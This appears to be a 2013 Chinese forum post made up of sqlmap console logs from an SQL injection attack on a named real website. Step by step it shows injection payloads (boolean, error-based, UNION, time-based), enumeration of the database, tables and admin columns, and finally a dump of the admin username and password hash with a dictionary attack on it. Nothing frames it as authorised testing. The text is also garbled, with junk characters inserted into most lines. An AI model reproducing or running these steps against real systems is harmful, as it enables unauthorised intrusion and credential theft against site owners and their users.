D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ a) c& Y6 U- c; M: q9 a4 ems "Mysql" --current-user /* 注解:获取当前用户名称, l" M3 U4 r$ s1 Q, f5 c
sqlmap/0.9 - automatic SQL injection and database takeover tool+ R6 G+ w# O# v. S0 e
http://sqlmap.sourceforge.net starting at: 16:53:54
' y" o7 g3 N6 C$ h/ d5 y! F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 x) V: c. H8 T session file' g* ]3 n" L+ H( U3 h \
[16:53:54] [INFO] resuming injection data from session file
/ l% X3 _, `* c! P7 A: @[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 V2 V/ y6 A3 Q! c% l[16:53:54] [INFO] testing connection to the target url' |& d5 E6 z+ x0 b
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. q. u3 g, o: L$ C( H4 E0 |
sts:7 A) E0 ?( M# j. O& p; m
---$ @5 f- V Y1 ~, |. s
Place: GET3 @+ x( a5 m- o
Parameter: id
U% k2 q2 u; \$ g/ K Type: boolean-based blind, c% r, N: `( ^/ U/ {
Title: AND boolean-based blind - WHERE or HAVING clause; Z; k1 c8 i" Q7 K' K) x$ X
Payload: id=276 AND 799=799- @) _* G6 I$ I+ _" V
Type: error-based
' e m- {: z, [: S# d- K* x* Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( E+ `3 u: n. m0 z# ^ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 D) L: G1 p5 F* i# j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' V8 L4 n+ I; D, t5 v: ^/ R9 G& Y! Q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 l8 z% X& @5 @7 ~* J2 W6 D Type: UNION query
7 [+ p& h% L6 d8 [' \6 \ Title: MySQL UNION query (NULL) - 1 to 10 columns
6 a9 c- E$ U- g0 |5 t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ M, m/ {1 ^' G2 m2 S4 w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 M' D# A; A4 V, K7 W; M- g! `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! a$ U) I( C# Q+ \
Type: AND/OR time-based blind
, l$ V8 R) t8 U7 f Title: MySQL > 5.0.11 AND time-based blind& ?+ j6 B$ c5 C0 P8 b
Payload: id=276 AND SLEEP(5), h& K2 w. m. m4 c
---
9 ]6 N y, s/ I8 d& Y[16:53:55] [INFO] the back-end DBMS is MySQL
& W. E4 a; E& R6 p1 R k5 i- nweb server operating system: Windows
2 k a: [2 a0 y! F: Xweb application technology: Apache 2.2.11, PHP 5.3.0. X, n2 e# z: v* w
back-end DBMS: MySQL 5.0
5 l7 o8 F8 `: e) X9 t& |) \' m[16:53:55] [INFO] fetching current user7 F+ A4 F+ I# C) ?( U
current user: 'root@localhost' " F0 b* {% y/ F/ Z; m& R$ O1 S T
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: |0 m+ u, z$ g; I5 Dtput\www.wepost.com.hk' shutting down at: 16:53:58; C% z& E" p& m
& r6 G$ `5 ?& @5 x0 T3 e
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- D$ B$ X0 H1 Q5 T* ]ms "Mysql" --current-db /*当前数据库' I& S7 F- e* m
sqlmap/0.9 - automatic SQL injection and database takeover tool8 H+ i/ o0 o# \6 ~' C7 p$ z7 F
http://sqlmap.sourceforge.net starting at: 16:54:16' K; ^$ @. H O$ x* J
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 w+ b9 r: G; r# J7 b% a5 f t6 V$ m7 b session file7 t3 S7 A, f5 B' `- e6 Z
[16:54:16] [INFO] resuming injection data from session file2 ]* c. }& ]! X/ a: v8 Y1 Y+ T
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* t" M. w7 n3 D ?. o
[16:54:16] [INFO] testing connection to the target url2 K% f+ R& k y0 b1 L6 i- `. I9 u
sqlmap identified the following injection points with a total of 0 HTTP(s) reque! x6 C/ @/ U" k; R+ p8 f( z
sts:
+ |% R( Y0 g! w/ p4 b& m8 C---0 P- J% x1 m0 l3 D! Q- A& l
Place: GET c' W. `' x0 L2 i6 s f, ~
Parameter: id$ I i( l9 E: y+ Y. m2 Z' v) @7 K& ?
Type: boolean-based blind
7 H+ g# x$ X' o0 l& `+ q Title: AND boolean-based blind - WHERE or HAVING clause3 b+ C6 q6 Q# p
Payload: id=276 AND 799=799
, A- Z" x b( [6 s( b Type: error-based, D6 j8 P% a7 y% ]
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# j0 n8 g+ k' w; c) W
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( A. v) s2 A G$ Q7 H120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 R* V! }0 {1 |* g7 i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( [. Z1 g" S; _ X3 N Type: UNION query
8 b( j) d* w0 T, c, c5 H7 C* [ Title: MySQL UNION query (NULL) - 1 to 10 columns
2 c+ U3 g* e( Y E Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" a) ]" w: [# F) o) j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 M, [# Y" {/ R G; k1 X: w, h8 J2 l
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& a& A3 G1 j5 i3 ~" p$ W6 U( V& B
Type: AND/OR time-based blind
4 J: c J5 P1 E f Title: MySQL > 5.0.11 AND time-based blind
: i$ B3 [0 r8 | K/ d p$ F Payload: id=276 AND SLEEP(5)
2 A" r0 u1 g U8 i% T---
& }9 G+ y4 E7 P- b: k2 Y+ z; y[16:54:17] [INFO] the back-end DBMS is MySQL
$ Y W3 F2 f3 T! g. }$ Bweb server operating system: Windows* S& T) y8 s" g5 i& l
web application technology: Apache 2.2.11, PHP 5.3.08 A, r9 T. {' t8 o! i
back-end DBMS: MySQL 5.0
) c! B: m8 c& ?: x0 c7 @[16:54:17] [INFO] fetching current database
% ]/ r- V- g, Q" Hcurrent database: 'wepost'
4 e* P! d1 z) @, _! @* b" [, F[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; d0 u d/ ^$ C: H9 E) S1 xtput\www.wepost.com.hk' shutting down at: 16:54:18% x7 L/ g! q7 C- Z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 y/ \! ~" I% a1 D H
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名 L1 P ~/ {. \7 N1 U' M
sqlmap/0.9 - automatic SQL injection and database takeover tool% q) z! m( H% Q& a0 t( F
http://sqlmap.sourceforge.net starting at: 16:55:25% n s) V' n8 K1 [
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% w/ p6 h! L' ^8 U- f, j1 w. f session file, K7 `) K h& z! u9 s0 o% ^ y$ G; {# J
[16:55:25] [INFO] resuming injection data from session file8 [0 k6 F1 f$ K# l( V; T3 a
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 P1 V& w; ]6 j( g1 Z% X9 y[16:55:25] [INFO] testing connection to the target url$ E8 m. }' g) h7 i0 g m$ D1 k5 v$ E
sqlmap identified the following injection points with a total of 0 HTTP(s) reque; c+ l5 \% g0 G/ l
sts:+ @* l4 Z; W" |4 k
---
& K8 p4 b: M8 ~1 \$ Y. LPlace: GET
. s+ H8 W2 J* `% ]Parameter: id: j3 f1 b% l9 ^5 R8 M5 K6 j
Type: boolean-based blind$ x& I4 h, w2 C7 y3 t% W5 w
Title: AND boolean-based blind - WHERE or HAVING clause
5 H; |7 M/ m+ q Payload: id=276 AND 799=799
3 N7 z" o) l" L1 E5 \1 [ Type: error-based# H& \$ q; `4 j) W
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* U) ?2 J8 s8 N0 E! |) k4 A6 H
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 t, U% r) D: I& o0 D# O& ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 ~ k+ j) R$ ?8 t, C
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 }7 T+ l3 U( K; M Type: UNION query" N! x5 o4 w6 l6 g
Title: MySQL UNION query (NULL) - 1 to 10 columns! p5 r: L5 a* K; m q2 H1 z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# y, [3 A) y; f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 h: t! W0 ]/ v5 Q! |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) I; C+ J5 z. k. K/ \; g Type: AND/OR time-based blind
6 V4 M; o/ F# g3 V* U& M7 I; I5 {4 ^ Title: MySQL > 5.0.11 AND time-based blind3 Q6 `/ d0 |6 P/ ~- S; ~. y
Payload: id=276 AND SLEEP(5)8 k3 Q% n1 S1 x4 N+ i
---* z5 o$ Y- y+ {3 ?# }/ C
[16:55:26] [INFO] the back-end DBMS is MySQL
6 i& S+ B% U- I! Tweb server operating system: Windows* G: M2 |' Z; _! W5 P9 K
web application technology: Apache 2.2.11, PHP 5.3.00 A& [; U/ ? z+ X$ N ?
back-end DBMS: MySQL 5.06 g1 U, t5 C7 F R
[16:55:26] [INFO] fetching tables for database 'wepost'/ R& q: [' U( K- W+ I. G B
[16:55:27] [INFO] the SQL query used returns 6 entries
/ P0 ?& \- W- }, N1 \Database: wepost* n/ i3 g8 ]. q9 D' H. c
[6 tables]
- H! l9 Z0 L. `6 F; V2 F$ \+-------------+' J* j! h0 P c* I+ k
| admin |
: V, K% j! e; J* U: ~" A| article |
1 n7 }6 ^ K3 i| contributor |# X0 ~( D( p& q5 Y
| idea |
; i) o% x* I1 {; D+ E3 {| image |
3 c8 f. J) ?3 e# u8 v( H5 C: J5 R| issue |
# m3 P- s/ [1 @3 v+-------------+
- X/ m. U$ \4 P" ^$ w* ~[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
K7 z6 @3 t0 j5 A2 k8 x( N, ?& mtput\www.wepost.com.hk' shutting down at: 16:55:33
% C! N3 k6 q4 r
% J5 T% U: I$ sD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* E- _! T' b- L; c8 `5 @ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名' O, n& v J( o! f
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 J2 G: c4 x( z+ q/ o http://sqlmap.sourceforge.net starting at: 16:56:06+ ~! U- `- w7 p0 m
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) p& t9 H$ b" |4 B- W; o2 y9 ists:3 o# \2 E' c! j7 B6 i
--- M: Z( j$ ^' |" y6 i3 z4 t
Place: GET
5 F6 v) T- u; J% e; [Parameter: id
9 U( ~1 G+ M' Q# t* ~8 u- Z- [ Type: boolean-based blind
- o; I6 N8 N3 f7 ` Title: AND boolean-based blind - WHERE or HAVING clause
}8 A, u/ S5 y z/ ? Payload: id=276 AND 799=799
4 ^1 X# T) W1 V! j* w# I Type: error-based
p, N7 x8 `, |# d Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ Y4 a" d! Q& t, V+ m Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. O$ v/ p4 O: I* S7 v3 C% @
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. N. ~8 {9 X2 l+ g) u+ Q9 O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! E3 x* f7 A5 S Type: UNION query: i; q/ O4 |& _$ v2 N
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ _% c1 Z. D3 h# G3 a$ r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 w" B o6 N4 w/ X3 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- c% B! l) l7 y$ v5 Y' D* }" i, hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; e$ U' J& W3 ?! `0 d$ c Type: AND/OR time-based blind
: x9 u( x7 `/ F/ W Y. c7 l! _% @ Title: MySQL > 5.0.11 AND time-based blind% {+ A$ p; R2 i2 F
Payload: id=276 AND SLEEP(5)5 p' ^" h* C7 n5 z
---( f. ]1 }( p! ?
web server operating system: Windows( a* L+ u% ?( U% P0 d
web application technology: Apache 2.2.11, PHP 5.3.0
1 p4 w, _! a6 i* j0 Y5 Iback-end DBMS: MySQL 5.0$ R! \( ?+ q$ M+ l5 P8 ~5 }( ^2 E; M5 n
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& T$ p* ]9 |, |: |! Nssion': wepost, wepost
/ ]# s) q2 |" o* F" k, zDatabase: wepost
; w# L' `/ c' L {Table: admin
' X: l5 x" S o8 B0 ?0 d, A' L[4 columns]
- `9 O9 S# {5 G. u* a+----------+-------------+; |! R# C5 U7 z& k' u; U' W
| Column | Type |
) ^( j- Q1 Y7 C' t/ i+----------+-------------+
# _' {) g. B) ~; Z( p9 m Y| id | int(11) |
! ^# G: ^4 d* p% e( g' ]" I| password | varchar(32) | L9 x8 G: V* W) r% K
| type | varchar(10) |7 ~) |2 K& |0 e7 z7 F* S3 G
| userid | varchar(20) |
0 t) y' C9 I( t1 b0 Y: u9 W6 _+----------+-------------+3 Z5 L' q7 H; ~7 ]
shutting down at: 16:56:19
7 U7 |' A/ b3 C4 u. _8 \. I4 r
- F7 d7 Z4 n! _+ ~4 VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, z3 M3 P5 W4 Z% s( ~! Gms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
u6 w. H Y V* A8 T" { sqlmap/0.9 - automatic SQL injection and database takeover tool' e- B; z# P# R) K: H
http://sqlmap.sourceforge.net starting at: 16:57:14
: p, H8 P& G# d% H0 I! O9 i+ a8 B4 wsqlmap identified the following injection points with a total of 0 HTTP(s) reque
: q+ Y8 T3 t- p! p2 G- C: bsts:
5 l4 a$ G. R4 N2 m- M---
1 l# X+ d0 B5 YPlace: GET n, a2 e% X5 [8 w4 u
Parameter: id
/ ~; M- {3 [1 p. F, L: g5 | Type: boolean-based blind! ?% _9 H9 i+ |3 k' L" \ R
Title: AND boolean-based blind - WHERE or HAVING clause
5 U8 j5 o# _3 e- n" } Payload: id=276 AND 799=799- H5 _1 Y) m# X# f
Type: error-based# h4 O0 _6 P& q8 D: T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& O5 Y( i7 W' |5 s% b8 y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# ^, P% Z) `' s' I9 O! b
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& A- ~' S/ m) `9 k. N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 y" E% B2 ^, u- y Type: UNION query
! \" P; p/ ?2 X+ B Title: MySQL UNION query (NULL) - 1 to 10 columns9 u: x' O' i+ s0 ?7 q6 D
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! `" z, \+ U2 e/ k6 Y, o
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, l8 Z, A( z, H. F! m4 j
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 l! f; {3 V- Q6 W* u Type: AND/OR time-based blind
0 p: j9 W3 u, G" ~. Q! e$ E Title: MySQL > 5.0.11 AND time-based blind
! G/ x4 d7 l+ @3 J9 ? Payload: id=276 AND SLEEP(5)
3 e% E y& s) j* G r7 I d---8 d" d) }% }' ^6 B- w( ~' g
web server operating system: Windows' Z% `" r3 a% g" y
web application technology: Apache 2.2.11, PHP 5.3.0
7 x: N5 S6 r7 N) C8 Y) U# ? kback-end DBMS: MySQL 5.06 T( `# |8 J* {) W
recognized possible password hash values. do you want to use dictionary attack o
6 {$ V& ]! M; l. h/ qn retrieved table items? [Y/n/q] y
9 o) A' `* F$ P, U& p& {what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
; t3 s) l( q5 \$ C" J4 B+ `, F- Ido you want to use common password suffixes? (slow!) [y/N] y- j# h5 B4 `2 }& T; U
Database: wepost; K! q! V) D0 R) \- c9 k
Table: admin' E. H# ^; p: R- C7 }
[1 entry]
" E( C1 G& G7 u4 w. C% E+ b+----------------------------------+------------+
; f4 ~ W6 z* w' @# C v4 t| password | userid |
& K& {2 j) B ]4 P. H& K- g+----------------------------------+------------+
, D a* a3 }1 J! I) U/ D| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
# y7 u3 u- [# K1 P# y+ O, H6 b+----------------------------------+------------+7 W P+ F/ B- v3 f
shutting down at: 16:58:14
: f `. g( x" |- l' ^* h0 n1 i2 M' \; g* t9 s
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对